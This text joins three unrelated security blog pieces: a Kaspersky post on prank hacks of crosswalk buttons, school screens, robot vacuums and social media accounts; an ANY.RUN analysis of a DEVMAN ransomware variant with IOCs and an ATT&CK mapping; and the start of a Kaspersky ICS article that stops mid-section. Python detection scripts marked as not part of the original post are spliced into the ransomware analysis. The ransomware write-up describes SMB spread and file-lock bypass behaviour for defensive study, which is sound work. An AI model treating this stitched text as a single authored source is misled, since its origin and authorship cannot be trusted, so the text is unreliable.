The top-five funny school, social media, and IoT hacks | Kaspersky official blog

On this here blog of ours we constantly write about all sorts of cyberattacks and their devastating effects — from cryptocurrency theft to personal data leaks. Yet there’s a different category of high-profile hacks: those where the hackers aren’t after money, but instead pull off silly stunts that are mostly harmless and just for fun (though some could be more serious than others; one in particular, the Ecovacs hack below). Today, we tell you about five of these and discuss the lessons we can learn from them…

“They’re everywhere!” When traffic lights talk to you in the voices of Zuckerberg and Musk

In the spring of 2025, unknown individuals hacked crosswalk buttons on traffic lights across Silicon Valley. These audio-enabled buttons are widely installed on pedestrian signals across the United States. As you might expect, they’re designed for people with visual impairments: their main purpose is to play voice messages that help pedestrians who can’t see well understand when it’s safe to cross the road.

The unknown individuals replaced the standard voice messages on crosswalk buttons in several Silicon Valley towns with their own — featuring AI-generated imitations of the ubiquitous tech-billionaires Mark Zuckerberg and Elon Musk. Videos recorded by local residents show the hacked buttons playing the messages.

In a voice imitating Mark Zuckerberg: “It’s normal to feel uncomfortable or even violated, as we forcefully insert AI into every facet of your conscious experience. I just want to assure you, you don’t need to worry because there’s absolutely nothing you can do to stop it.”

In a voice imitating Elon Musk: “You know, they say money can’t buy happiness… I guess that’s true. God knows I’ve tried. But it can buy a Cybertruck and that’s pretty sick, right? F***, I’m so alone.”

Another message in a simulated Musk voice: “You know, people keep saying cancer is bad, but have you tried being a cancer? It’s f****** awesome. Call me Elonoma. Heh-heh-heh.”

The billionaires’ voices were clearly AI-generated, but exactly how the hackers managed to breach the traffic light audio buttons remains unknown. Security experts have noted, however, that default passwords are often used when connecting these kinds of buttons, and nobody bothers to change them after installation.

It looks like no one was hurt by the prank – except maybe the billionaires’ pride.

In Illinois, students learn a key lesson: never forget about Rick

On the last Friday of the 2021 school year, all the TVs and projectors in classrooms across six schools in Cook County, Illinois, turned on by themselves. A message appeared on the screens: “Please remain where you are. An important announcement will be made shortly.” A five-minute countdown timer was displayed below the unsettling message…

Five minutes later, 500 screens simultaneously started showing the famous Rick Astley video for Never Gonna Give You Up. Later that same day, the song played again over the schools’ public address systems.

The hackers behind this surprise airing of a pop… classic were four American students, and what they did that day was pull off one of the biggest Rickrolls in history. A Rickroll is a popular online prank where an unsuspecting user is sent a seemingly important or exciting link, only to be redirected to the video for English singer Rick Astley’s 1987 hit, Never Gonna Give You Up. Rickrolling achieved cult status back in 2007 after spreading on the 4chan imageboard.

Let’s get back to the four students. Their massive Rickroll was a hi-tech twist on a classic American tradition known as the senior prank: basically, a good-natured prank pulled by high-school, college, or university seniors before graduation.

However, the four Illinois students clearly took it to a new level. To pull off their Rickroll, they exploited fairly basic vulnerabilities in the school’s infrastructure. For example, the pranksters gained access to the system controlling hundreds of projectors and TVs across the entire school district because the default usernames and passwords hadn’t been changed after setup.

Similarly, the students were able to log into the schools’ audio public address systems. The person who originally configured the PAs diligently changed the default system password to the one provided as an example in the user manual, which of course was available online. While they were at it, the hacking team discovered an administrator account with “password” used as the password.

It’s worth highlighting just how responsibly the hackers approached the whole operation. Before carrying out the Rickroll, the prankster team prepared a detailed 26-page report, which they sent to the school administrators immediately after the incident. In it, the students thoroughly described their actions and provided recommendations for improving the schools’ cybersecurity. Additionally, once the Rickroll was over, the script they wrote restored the school systems back to their original state.

We always knew: the rise of the machines would begin with robot vacuums

Last year, reports surfaced online about a series of hacks targeting Chinese-made Ecovacs Deebot X2 robot vacuums in cities across the United States. Pranksters assumed control of the robots’ movements and shouted expletives through the built-in speakers. Additionally, they could spy on the owners through the integrated cameras.

The story seemingly had its beginnings at the DEF CON 32 hacker conference, where cybersecurity researchers Dennis Giese and Braelynn Luedtke presented their talk, Reverse engineering and hacking Ecovacs robots. The presentation described vulnerabilities they’d discovered in Ecovacs robot vacuums and lawnmowers, as well as methods for exploiting them. As part of their study, the researchers were able to gain remote access to the built-in microphones and cameras and control the vacuums’ movements. We previously covered their work in detail in our post Ecovacs robot vacuums get hacked.

(By the way, during their presentation at DEF CON, Giese and Luedtke themselves became the target of a hacker prank: a member of the audience managed to take control of the presenter’s clicker and spent several minutes messing with the speakers by randomly flipping through their slides.)

Giese and Luedtke reported their findings to the vendor in a responsible manner. Ecovacs engineers attempted to patch the vulnerabilities, but didn’t have much luck. Several months after the report went out, unknown tech enthusiasts, likely inspired by the study, were able to recreate the techniques described in it to execute a series of attacks on other people’s robot vacuums. For example, in one such attack in California, a robot chased the owner’s dog around the house while shouting obscenities.

The exact number of victims from this series of hacks remains unknown, as it’s plausible that the pranksters didn’t always make their presence obvious — they might have simply observed the vacuum owners’ lives. That, clearly, would have been a very serious infringement of those owners’ privacy – and could in no way be described as mere “fun and games”; neither could this: what if Ecovacs lawnmowers are next?

Lizard Squad “breaking free”: a defacement free redesign of Lenovo’s website

Here’s another playful attack by teenagers, this time targeting Lenovo. A decade ago, the computer manufacturer’s website was hacked. Visitors were redirected to a slideshow featuring photos of bored-looking adolescents, presumably the hackers themselves, all set to the song Breaking Free from Disney’s High School Musical.

Clicking on the slideshow would lead users to the hacking group Lizard Squad’s account on X, which was still known as Twitter at the time. The hackers left a jab at the webmasters in the source code: “The new and improved rebranded Lenovo website featuring Ryan King and Rory Andrew Godfrey”. These two individuals had previously been linked to Lizard Squad.

The attack was orchestrated via DNS hijacking. The hackers altered the DNS records for lenovo.com, causing all users attempting to reach the official company website to be automatically redirected to a fake page controlled by the pranksters.

The attack was apparently a protest against what was seen as the computer vendor’s lax attitude toward security and user protection. Shortly before the defacement, it was revealed that Lenovo had been selling laptops preloaded with Superfish malware. This made users who purchased infected devices potentially vulnerable to data interception and man-in-the-middle attacks. Thus, the hack seems kind of wrong, but at the same time feels justified.

Bring back 2013, when Twitter accounts were hacked for mischief — not crypto scams

These days, when the X account of a high-profile individual or major company gets hacked, it almost invariably leads to some kind of cryptocurrency scam. But it wasn’t always this way. Just a decade ago, popular accounts on what was then still known as Twitter were more often hijacked for giggles than for illicit financial gain.

Take February 2013, for example. Unknown hackers breached Burger King’s Twitter account to post this gem: “We just got sold to McDonalds! Look for McDonalds in a hood near you.”

On top of that, Burger King’s profile picture was swapped out for the McDonald’s logo, and their bio read: “Just got sold to McDonalds because the whopper flopped.” The bio also included the misspelled line “FREDOM IS FAILURE” and a dead link to a press release.

For about an hour, the attackers posted increasingly outrageous messages before Twitter finally suspended the account. Interestingly, Burger King’s arch-rival, McDonald’s, tweeted a message of support — while making sure to clarify they had nothing to do with the breach.

Fast-forward to August 2017, which was when the Ourmine hacking outfit targeted the Twitter account of soccer giant Real Madrid. The hackers used the club’s account to announce that none other than Lionel Messi, who then played for Real Madrid’s fiercest rival, FC Barcelona, was transferring to Real Madrid.

The post quickly racked up 2800 likes and 3100 retweets. Ourmine also posted a series of tweets claiming responsibility for the hack, with one declaring, “Internet security is s*** and we proved that.” It’s hard to argue with that.

A takeaway from the hacks: protect your password from the start

Perhaps the most crucial lesson to learn from these online shenanigans is this: using weak — or even worse, default — passwords is a surefire way to hand control of your device, account, or website to internet pranksters… if you’re lucky. Weak passwords were what tripped up city infrastructure and school administrators, and it’s highly likely that the Twitter account hacks were also linked to a careless approach to password policies.

This blog has frequently discussed how to create strong passwords. But to wrap things up, let’s reiterate a few basic rules of password hygiene:

  • Passwords should be at least 16 characters long, or even longer if the website allows it.
  • When creating a password, it’s good practice to mix uppercase and lowercase letters, numbers, and special characters.
  • It’s best to avoid easily guessable things like common words or dates in your password. And you definitely shouldn’t use the word “password”.
  • Ideally, your password should be a random combination of characters.
  • Create a new, unique password for each website.

Of course, any user today signs up for dozens, if not hundreds, of online services. So, remembering long and unique passwords for each one isn’t feasible. That’s where Kaspersky Password Manager can help you manage this and protect yourself not just from pranks, but from far more serious consequences.

Additionally, the app automatically checks all your passwords for uniqueness, and helps you create truly strong and random combinations of characters. So, when using Kaspersky Password Manager, you don’t need to keep all those complex rules in mind — the password manager does it all for you. Beyond passwords, Kaspersky Password Manager can store and sync two-factor authentication tokens and passkeys. We recently thoroughly explored this new passwordless technology for accessing websites and services in our complete guide to using passkeys in 2025.

DEVMAN Ransomware: Analysis of New DragonForce Variant 

Editor’s note: The current article is authored by Mauro Eldritch, offensive security expert and threat intelligence analyst. You can find Mauro on X. 

New ransomware strains continue to surface frequently, and many of them are loosely built on or repackaged from existing families. One such case involves a sample resembling DragonForce ransomware, yet bearing several unique traits and identifiers suggesting the involvement of a separate entity known as DEVMAN. 

A previously analyzed campaign connected to the Mamona strain, itself linked to BlackLock affiliates and the Embargo group, also intersected with DragonForce activity. During one such attack, DragonForce actors exfiltrated a target’s .env file and published it on their Dedicated Leak Site (DLS) on Tor with the caption: “Is this your .env file?” 

This newer sample, uploaded by TheRavenFile, appears related but not entirely identical to the DragonForce lineage. Despite being labeled as a DragonForce or Conti variant by most AV engines, the sample displays unique behaviors that point toward DEVMAN involvement. 

Our DragonForce/Conti sample on VT, but don’t be fooled by appearances 

DEVMAN: Key Takeaways 

  • DEVMAN reuses DragonForce code but adds its own twists: The .DEVMAN extension and unique strings sit on top of a mostly DragonForce codebase. 
  • Attribution is muddy: AV engines label the sample as DragonForce or Conti, yet its behavior and leak-site links point to DEVMAN. 
  • DragonForce’s RaaS model allows affiliates to create spinoff variants: That’s likely how samples like DEVMAN emerged; built on DragonForce code, but customized and repackaged.
  • Ransom notes encrypt themselves: This happens likely due to a builder flaw.
  • Most malicious activity takes place offline, aside from SMB probing: No external C2 communication was observed during analysis. 
  • Three encryption modes are built in: full, header-only, and custom. 
  • Behavior varies by OS: Wallpaper change fails on Windows 11 but works on Windows 10. 

Dragons as a Service 

Some time ago, DragonForce introduced their RaaS (Ransomware-as-a-Service) model, aiming to recruit both affiliates to operate their ransomware and others who wanted to use their infrastructure, branding, and reputation as a platform to publish stolen data.  

This shift brought new actors into the landscape, increasing overall activity, noise, and irregularities, including the sample analyzed here. Depending on the analyst or tool, it may be labeled as DragonForce, Conti (the base framework for DragonForce), or DEVMAN. 

DEVMAN? A relatively new actor has recently emerged under this name, featuring its own Dedicated Leak Site (DLS) called Devman’s Place, a separate infrastructure, and nearly 40 claimed victims, primarily in Asia and Africa, with occasional incidents in Latin America and Europe. 

A Hybrid Ransomware Sample 

Let’s analyze the sample inside ANY.RUN’s secure interactive sandbox

This sample, flagged by most antivirus engines as DragonForce (or Conti), is actually modified to behave like a new variant belonging to DEVMAN. It uses that name as the file extension for encrypted data but otherwise shares a large part of its codebase with DragonForce, including leftover strings and identifiers. That strongly suggests DEVMAN may be using a DragonForce build for some of its operations.

Encrypted file with the .DEVMAN extension 

This appears to be a lightly customized version; one that hasn’t attracted much attention, either from the threat intelligence community or from its own operator. The result is a tangled ransomware crossbreed with overlapping traits.  

Automatic detection labels the sample as “DragonForce” 

A closer look reveals more. 

Initial Behavior and Detection 

First things first — our newborn dragon does what dragons do: it burns down the village. Files are encrypted rapidly and automatically, also attempting to locate SMB shared folders to spread further — but in our lab environment, it wasn’t that lucky. 

Two things caught our attention immediately. First, on Windows 11, the sample was unable to change the wallpaper for unknown reasons, while on Windows 10 it worked flawlessly.  

Second, although desktop files are the most visible, they are not the last to be encrypted. The process continues beyond them. 

SMB traffic attempting to laterally spread the infection 

Ransom Note Issues and Deterministic Renaming 

The ransom notes were not dropped as expected. Instead, every location where a note should have appeared contained, quite mysteriously, a file with a scrambled name and the .DEVMAN extension, suggesting the sample might be malfunctioning and targeting its own files. 

Fortunately, ANY.RUN logs all activity, not just network traffic, but disk writes as well, allowing us to reconstruct one of those files right at the moment it was created. And, interestingly enough, the ransom note isn’t just similar to the ones used by DragonForce. It is, in fact, a DragonForce ransom note. 

A DragonForce ransom note 

When retrieving the list of created and modified files, we noticed an interesting pattern: the sample scrambles file names instead of simply appending an extension. 

And here’s the most curious part; its own readme.txt files, once encrypted, are always renamed to e47qfsnz2trbkhnt.devman. This strongly suggests the use of a deterministic function that produces static outputs for identical inputs. 

Encrypted Ransom notes, all sharing the same name 
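To make the renaming pattern described above concrete, here is an added example (not code from the ANY.RUN post) that scans a constructed sandbox-style file-event trace for the two tells: the same encrypted basename recurring across directories (a deterministic rename) and ransom notes that were themselves encrypted. Only the .devman extension and the fixed name e47qfsnz2trbkhnt.devman come from the article; the trace lines, paths and other encrypted names are constructed.

```python
"""Detect deterministic renaming and self-encrypted ransom notes in a
file-event trace. Added example, not code from the ANY.RUN post: the trace
below is constructed; only the .devman extension and the fixed encrypted
note name e47qfsnz2trbkhnt.devman come from the article."""
import ntpath
import re
from collections import defaultdict

# Constructed sandbox-style trace: "<seq> <op> <path>[ -> <new path>]"
SAMPLE_EVENTS = """\
1 CREATE C:\\Users\\alice\\Desktop\\readme.txt
2 WRITE  C:\\Users\\alice\\Desktop\\report.docx
3 RENAME C:\\Users\\alice\\Desktop\\report.docx -> C:\\Users\\alice\\Desktop\\k3p9xq1zvb7m4nd2.devman
4 RENAME C:\\Users\\alice\\Desktop\\readme.txt -> C:\\Users\\alice\\Desktop\\e47qfsnz2trbkhnt.devman
5 CREATE C:\\Users\\alice\\Documents\\readme.txt
6 RENAME C:\\Users\\alice\\Documents\\readme.txt -> C:\\Users\\alice\\Documents\\e47qfsnz2trbkhnt.devman
7 WRITE  C:\\Users\\alice\\Documents\\notes.txt
8 RENAME C:\\Users\\alice\\Documents\\notes.txt -> C:\\Users\\alice\\Documents\\p0q1r2s3t4u5v6w7.devman
9 CREATE C:\\Users\\alice\\Pictures\\readme.txt
10 RENAME C:\\Users\\alice\\Pictures\\readme.txt -> C:\\Users\\alice\\Pictures\\e47qfsnz2trbkhnt.devman
"""

LINE_RE = re.compile(r"^(\d+)\s+(\w+)\s+(.+?)(?:\s+->\s+(.+))?$")


def parse_events(text):
    """Turn trace lines into dicts; lines that do not match are skipped."""
    events = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        seq, op, path, new_path = m.groups()
        events.append({"seq": int(seq), "op": op.upper(),
                       "path": path, "new_path": new_path})
    return events


def analyze_renames(events, ext=".devman", note_name="readme.txt"):
    """Summarise RENAME events whose target ends in the ransomware extension.

    deterministic_names: encrypted basenames that recur in more than one
    directory, which only happens when the new name is a deterministic
    function of the original (not a random string per file).
    self_encrypted_notes: original paths of ransom notes that were renamed
    to the extension, i.e. the builder flaw described in the article.
    """
    dirs_by_name = defaultdict(set)
    self_encrypted_notes = []
    encrypted_total = 0
    for ev in events:
        if ev["op"] != "RENAME" or not ev["new_path"]:
            continue
        if not ev["new_path"].lower().endswith(ext):
            continue
        encrypted_total += 1
        new_base = ntpath.basename(ev["new_path"]).lower()
        dirs_by_name[new_base].add(ntpath.dirname(ev["new_path"]).lower())
        if ntpath.basename(ev["path"]).lower() == note_name:
            self_encrypted_notes.append(ev["path"])
    deterministic = {name: sorted(dirs)
                     for name, dirs in dirs_by_name.items() if len(dirs) > 1}
    return {"encrypted_total": encrypted_total,
            "deterministic_names": deterministic,
            "self_encrypted_notes": self_encrypted_notes}


def is_devman_like(report):
    """Heuristic verdict: notes were encrypted AND an encrypted name repeats."""
    return bool(report["self_encrypted_notes"]) and bool(report["deterministic_names"])


if __name__ == "__main__":
    rep = analyze_renames(parse_events(SAMPLE_EVENTS))
    for name, dirs in rep["deterministic_names"].items():
        print(f"{name} appears in {len(dirs)} directories: {dirs}")
    print("self-encrypted notes:", rep["self_encrypted_notes"])
    print("DEVMAN-like:", is_devman_like(rep))
```

The repeated-name check is a weak IOC on its own (a single scrambled name is trivially changed in a rebuild), but paired with the self-encrypted-note check it separates this builder flaw from ordinary per-file random renaming.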

Offline Behavior and Local Footprint 

So, let’s focus on those local oddities, and a good place to start is the binary itself.

Aside from the aforementioned SMB connections, no suspicious network dialogue was observed, suggesting that all malicious activity takes place locally and offline.  

Using FLOSS, a tool by Mandiant, we can decode and extract additional strings to better understand the sample’s internal logic prior to disassembly. 

The first thing we notice is that the sample checks for Shadow Copies (probably just to make sure we’ve got a solid backup policy in place) and lists a series of file extensions that it deliberately avoids encrypting. 

Decoded strings obtained via FLOSS

Encryption Modes and File Targeting 

Further analysis reveals multiple encryption modes: full encryption, header-only encryption, and custom encryption, designed to prioritize either speed or complexity, depending on the intended scenario.  

Header-only encryption, in particular, allows the malware to corrupt large volumes of data in less time, trading completeness for speed. 

At least 3 different encryption modes are available 

SMB Spread and Local Targeting 

Further exploration reveals a bit more detail about the sample’s attempts to connect to SMB folders, explicitly referencing local network octets and hardcoding the ADMIN$ share name, along with several error and debug messages. 

Octets belonging to local addresses and a direct mention of the ADMIN$ share

Persistence and File Lock Evasion via Restart Manager 

Another interesting behaviour that further supports the Conti lineage of this sample is its interaction with the Windows Restart Manager. The malware creates temporary sessions under the registry key: 

HKEY_CURRENT_USER\Software\Microsoft\RestartManager\Session0000

There, it logs metadata such as Owner, SessionHash, RegFiles0000, and RegFilesHash, pointing to system-critical files like NTUSER.DAT and its corresponding logs. 

Each of these entries is quickly deleted after being written, likely an attempt to avoid leaving persistent forensic traces. This pattern mirrors behaviour seen in Conti and later carried on by DragonForce, which now appears to be inherited by DEVMAN (what a Zoo!).  

The goal seems clear: use the Restart Manager to bypass file locks so that files held open by active user sessions can still be encrypted. It’s noisy, and somewhat old, but it works.

Regkeys altered by the sample 
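The write-then-delete pattern described above can be correlated from registry telemetry. The following added example (not code from the ANY.RUN post) pairs SetValue and DeleteKey events on RestartManager session keys and flags sessions that reference a user hive and are torn down within seconds; the event lines are constructed in a simplified Sysmon-like layout, not Sysmon’s real schema, and only the registry path, value names and NTUSER.DAT reference follow the article.

```python
"""Flag short-lived Restart Manager sessions that reference a user hive.
Added example, not code from the ANY.RUN post. The event lines are
constructed in a simplified Sysmon-like layout (not Sysmon's real schema);
the registry path, value names and NTUSER.DAT reference follow the
article's description of the sample's behaviour."""
import re
from datetime import datetime

# Constructed events: "<iso time> <SetValue|DeleteKey> <image> <target>[ Details=<data>]"
# Session0000 is opened by a binary in Temp, pointed at NTUSER.DAT and torn
# down 300 ms later; Session0001 is a 45-second installer session for contrast.
SAMPLE_REGISTRY_EVENTS = """\
2025-06-20T10:15:01.100 SetValue C:\\Users\\alice\\AppData\\Local\\Temp\\sample.exe HKCU\\Software\\Microsoft\\RestartManager\\Session0000\\Owner Details=sample.exe
2025-06-20T10:15:01.120 SetValue C:\\Users\\alice\\AppData\\Local\\Temp\\sample.exe HKCU\\Software\\Microsoft\\RestartManager\\Session0000\\SessionHash Details=0x1f2e3d4c
2025-06-20T10:15:01.130 SetValue C:\\Users\\alice\\AppData\\Local\\Temp\\sample.exe HKCU\\Software\\Microsoft\\RestartManager\\Session0000\\RegFiles0000 Details=C:\\Users\\alice\\NTUSER.DAT
2025-06-20T10:15:01.140 SetValue C:\\Users\\alice\\AppData\\Local\\Temp\\sample.exe HKCU\\Software\\Microsoft\\RestartManager\\Session0000\\RegFilesHash Details=0x9a8b7c6d
2025-06-20T10:15:01.400 DeleteKey C:\\Users\\alice\\AppData\\Local\\Temp\\sample.exe HKCU\\Software\\Microsoft\\RestartManager\\Session0000
2025-06-20T10:20:00.000 SetValue C:\\Windows\\System32\\msiexec.exe HKCU\\Software\\Microsoft\\RestartManager\\Session0001\\RegFiles0000 Details=C:\\Program Files\\App\\app.dll
2025-06-20T10:20:45.000 DeleteKey C:\\Windows\\System32\\msiexec.exe HKCU\\Software\\Microsoft\\RestartManager\\Session0001
"""

EVENT_RE = re.compile(
    r"^(\S+)\s+(SetValue|DeleteKey)\s+(\S+)\s+(\S+)(?:\s+Details=(.+))?$")
SESSION_RE = re.compile(
    r"^(HKCU\\Software\\Microsoft\\RestartManager\\Session\d+)(?:\\(\w+))?$",
    re.IGNORECASE)


def parse_registry_events(text):
    """Parse constructed event lines; non-matching lines are skipped."""
    events = []
    for raw in text.splitlines():
        m = EVENT_RE.match(raw.strip())
        if not m:
            continue
        ts, kind, image, target, details = m.groups()
        events.append({"time": datetime.fromisoformat(ts), "kind": kind,
                       "image": image, "target": target, "details": details})
    return events


def detect_short_rm_sessions(events, max_lifetime_s=5.0):
    """Correlate SetValue/DeleteKey pairs on RestartManager session keys.

    A finding is raised when the same process creates a session, lists a
    user hive (NTUSER.DAT) among its RegFilesNNNN values, and deletes the
    key within max_lifetime_s. Installers legitimately open and close
    sessions too, so treat a hit as enrichment for the process (origin
    path, signature, file-write volume), not as a standalone verdict.
    """
    open_sessions = {}
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        m = SESSION_RE.match(ev["target"])
        if not m:
            continue
        key = (ev["image"].lower(), m.group(1).lower())
        value_name = m.group(2)
        if ev["kind"] == "SetValue":
            sess = open_sessions.setdefault(key, {"start": ev["time"], "files": []})
            if value_name and re.fullmatch(r"RegFiles\d+", value_name, re.I) and ev["details"]:
                sess["files"].append(ev["details"])
        elif ev["kind"] == "DeleteKey" and value_name is None:
            sess = open_sessions.pop(key, None)
            if sess is None:
                continue
            lifetime = (ev["time"] - sess["start"]).total_seconds()
            touches_hive = any(f.lower().endswith("ntuser.dat") for f in sess["files"])
            if lifetime <= max_lifetime_s and touches_hive:
                findings.append({"image": ev["image"], "session": m.group(1),
                                 "lifetime_s": lifetime, "files": sess["files"]})
    return findings


if __name__ == "__main__":
    for f in detect_short_rm_sessions(parse_registry_events(SAMPLE_REGISTRY_EVENTS)):
        print(f"{f['image']} opened {f['session']} for {f['lifetime_s']:.3f}s "
              f"referencing {f['files']}")
```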

Mutex Usage and Sample Coordination 

Another notable behavior involves the use of synchronization primitives, particularly mutexes, to coordinate the sample’s execution and possibly prevent multiple instances from running in parallel. This is standard among ransomware families derived from Conti, and this case is no exception. 

Right from the beginning, the sample creates a mutex named: hsfjuukjzloqu28oajh727190 

This mutex is not randomly generated; it is hardcoded into the binary, as confirmed by decoded strings extracted using FLOSS. Its presence suggests that the sample uses it to detect existing instances of itself, a basic anti-reentry mechanism. 

The sample also creates several mutexes and interacts with objects under the naming pattern: 

  • Local\RstrMgr[GUID]
  • Local\RstrMgr-[GUID]-Session0000

These mutexes are tied to the Windows Restart Manager API and match the behaviour seen in previous ransomware families (notably Conti and its derivatives), which use this mechanism to query which processes are holding handles to specific files.  

This facilitates forced encryption of locked resources, including user profile data like NTUSER.DAT. 

The reuse of fixed strings can serve as a strong indicator of compromise (IOC) for future detection or correlation with other samples likely created using the same packer or builder. However, this is a volatile indicator that is likely to change over time. 

When possible, assign a “trust” expiration date (or half-life) to indicators; this is a valuable practice for maintaining detection accuracy over time.

Mutexes used by the sample 
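One way to put the half-life recommendation above into practice, as an added example (not code from the ANY.RUN post): each indicator carries an initial confidence and a half-life, confidence decays exponentially from first sighting, and an expiry date falls out by solving for the day it crosses a trust threshold. The indicator values are the article’s IOCs; the first-seen date, confidences and half-lives are constructed assumptions.

```python
"""Indicator confidence with a half-life, as the article recommends.
Added example, not code from the ANY.RUN post. Indicator values come
from the article; first_seen dates, initial confidences and half-lives
are constructed assumptions for illustration."""
import math
from dataclasses import dataclass
from datetime import date, timedelta


@dataclass(frozen=True)
class Indicator:
    value: str
    kind: str
    first_seen: date
    initial_confidence: float   # 0..1, confidence on first_seen
    half_life_days: float       # math.inf for indicators that do not decay

    def confidence_on(self, day: date) -> float:
        """Exponential decay: confidence halves every half_life_days."""
        age_days = (day - self.first_seen).days
        if age_days <= 0 or math.isinf(self.half_life_days):
            return self.initial_confidence
        return self.initial_confidence * 0.5 ** (age_days / self.half_life_days)

    def expires_on(self, threshold: float):
        """First day on which confidence is below threshold (None = never).

        Solves initial * 0.5**(t / h) = threshold for t,
        i.e. t = h * log2(initial / threshold), then moves to the next whole day.
        """
        if math.isinf(self.half_life_days):
            return None
        if threshold >= self.initial_confidence:
            return self.first_seen
        days = self.half_life_days * math.log2(self.initial_confidence / threshold)
        return self.first_seen + timedelta(days=math.floor(days) + 1)


def active_indicators(indicators, day: date, threshold: float):
    """Values still trusted on `day`: confidence at or above threshold."""
    return sorted(i.value for i in indicators if i.confidence_on(day) >= threshold)


# Constructed first_seen date and decay parameters; the values are the
# article's IOCs. A hardcoded mutex is cheap to change in a rebuild, so it
# gets the shortest half-life; a file hash identifies this exact build forever.
FIRST_SEEN = date(2025, 6, 20)
MUTEX_IOC = Indicator("hsfjuukjzloqu28oajh727190", "mutex", FIRST_SEEN, 0.9, 30)
NOTE_NAME_IOC = Indicator("e47qfsnz2trbkhnt.devman", "filename", FIRST_SEEN, 0.8, 90)
HASH_IOC = Indicator(
    "df5ab9015833023a03f92a797e20196672c1d6525501a9f9a94a45b0904c7403",
    "sha256", FIRST_SEEN, 1.0, math.inf)
IOCS = (MUTEX_IOC, NOTE_NAME_IOC, HASH_IOC)

if __name__ == "__main__":
    for ioc in IOCS:
        print(f"{ioc.kind:9} {ioc.value[:24]:24} expires {ioc.expires_on(0.25)}")
    print("still trusted on 2025-09-01:", active_indicators(IOCS, date(2025, 9, 1), 0.25))
```

With these assumed parameters the mutex drops below a 0.25 trust threshold after 56 days, while the hash never expires; the point is that the expiry is computed from the indicator’s volatility rather than hardcoded per feed.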

Final Observations 

An Experimental Build with Unusual Behavior 

This sample looks more like an affiliate testing a new build than something currently being deployed that you’d casually run into in a production environment. While not particularly sophisticated, it presents a number of unusual behaviors worth highlighting, particularly its tendency to encrypt its own ransom notes. 

A Critical Flaw in the Builder 

While it’s ironic that no one could, at least not easily, pay the ransom without knowing who to pay (because the ransom note gets encrypted), the underlying message here is more serious: there’s a core design flaw in the builder that allows it to self-encrypt key components.  

That simple .txt file is often the only clue victims have to identify the threat actor and initiate negotiation; and for the threat actor, it’s the best chance of getting paid. 

I spoke with DEVMAN, who stated “[…] we stopped using DragonForce months ago […]”. 

Threat Actor Communication 

One noteworthy indicator of a threat actor’s maturity is their ability to maintain polite, detailed, and respectful communication; a trait that also applies to DEVMAN. This attitude seems to echo in their technical approach, even in cases where their ransomware encrypts its own ransom notes. 

A Familiar Build Beneath the Surface 

Now, if we strip this sample of its oddities, there’s not much to say about it on its own merits (no offense meant to the developers), or at least nothing to say that we haven’t covered in other articles about ransomware.

Still, its oddities make it a valuable case study, not for technical innovation, but for the way it reflects shifting actor dynamics and common development pitfalls in the ransomware ecosystem. 

Turning Oddities into Actionable Intelligence 

Unusual samples like this DEVMAN variant can easily slip past traditional analysis workflows. With the ransom note encrypted, filenames scrambled, and behavior differing across operating systems, manual investigation becomes time-consuming and key details are easy to overlook.

This is where ANY.RUN’s Interactive Sandbox proves invaluable. By logging every action in real time, from file system changes to mutex creation and registry modifications, it enables analysts to trace even fragmented or malfunctioning ransomware behavior.  

This kind of visibility gives security teams a real operational advantage: 

  • Faster detection and response: Immediate insight into threat behavior, even in offline or misconfigured attacks. 
  • Clearer attribution: Links to reused infrastructure, code similarities, and TTP patterns are surfaced early. 
  • More efficient investigation workflows: Analysts can extract IOCs, map persistence mechanisms, and understand impact without switching tools. 
  • Better collaboration across teams: Findings can be shared easily with SOCs, threat intel units, and communications teams, ensuring faster alignment during incidents. 

MITRE ATT&CK Mapping 

Let’s jump to drafting a quick ATT&CK matrix for this sample, which ANY.RUN does automatically for us:

  • T1204.002 – User Execution: Malicious File. The executable requires user (or threat actor) interaction to launch.
  • T1053.005 – Scheduled Task/Job: Scheduled Task. Presence of scheduling-related strings implies possible persistence via tasking.
  • T1027 – Obfuscated Files or Information. Internal file renaming and readme scrambling suggest static obfuscation logic.
  • T1070 – Indicator Removal on Host. The sample deletes registry keys and values shortly after writing them.
  • T1135 – Network Share Discovery. Explicit scanning for SMB shares (ADMIN$, IP ranges like 192.x, 172.x).
  • T1021.002 – SMB/Windows Admin Shares. Uses netapi32, srvcli, and netutils to interact with administrative shares.
  • T1005 – Data from Local System. Enumerates and encrypts user data including NTUSER.DAT and log files.
  • T1486 – Data Encrypted for Impact. Core functionality: encrypting files with the .DEVMAN extension.
  • T1490 – Inhibit System Recovery. Attempts to interact with volume shadow copies.

IOCs 

  • MD5: e84270afa3030b48dc9e0c53a35c65aa
  • SHA256: df5ab9015833023a03f92a797e20196672c1d6525501a9f9a94a45b0904c7403
  • FileName: hsfjuukjzloqu28oajh727190
  • FileName: e47qfsnz2trbkhnt.devman
  • SHA256: 018494565257ef2b6a4e68f1c3e7573b87fc53bd5828c9c5127f31d37ea964f8

References 

Analysis: https://app.any.run/tasks/64918027-01e6-415a-85b3-474fca5fc5c4 

VirusTotal Analysis (multiple labeling/attribution): https://www.virustotal.com/gui/file/df5ab9015833023a03f92a797e20196672c1d6525501a9f9a94a45b0904c7403

Original Intel Pulse (OTX): https://otx.alienvault.com/pulse/68535853fe15cff17229577d

The post DEVMAN Ransomware: Analysis of New DragonForce Variant  appeared first on ANY.RUN’s Cybersecurity Blog.

How much an ICS incident costs | Kaspersky official blog

Despite over a decade of talk about “industrial digital transformation”, it’s only now that we’re observing a tipping point. According to the VDC Research report Securing OT with Purpose-built Solutions, only 7.6% of surveyed industrial organizations consider themselves fully digital, but within two years 63.6% expect to be so. This shift is driven by two main factors: economic pressure pushing companies to radically increase efficiency, and the growing accessibility of technologies such as the industrial internet of things (IIoT) and edge computing.

Digitalization helps industrial enterprises boost both their efficiency and safety. Most organizations have already implemented asset, maintenance, and supply-chain management systems that reduce downtime and operating costs. More advanced technologies like digital twins and predictive analytics significantly improve processes, boost production, and cut waste of materials and resources. Integrating data from IT systems and ICS enables real-time decision-making based on up-to-date information.

But with integration comes vulnerability: systems that were once isolated or not digital at all become susceptible to IT failures and direct cyberattacks. Attacks on OT systems can lead to increased defect rates, failure of complex equipment, disruption of downstream production processes, and even catastrophic events that threaten worker safety. Even brief outages can have serious business consequences and damage a company’s reputation.

Major obstacles to industrial digitalization

According to the surveyed companies, cybersecurity concerns have become the main barrier to industrial digital transformation. Nearly 40% of the companies surveyed in the VDC report say they need to resolve this issue to move forward. Other top challenges include budget constraints and outdated equipment that’s too complex and expensive to upgrade for digital projects.

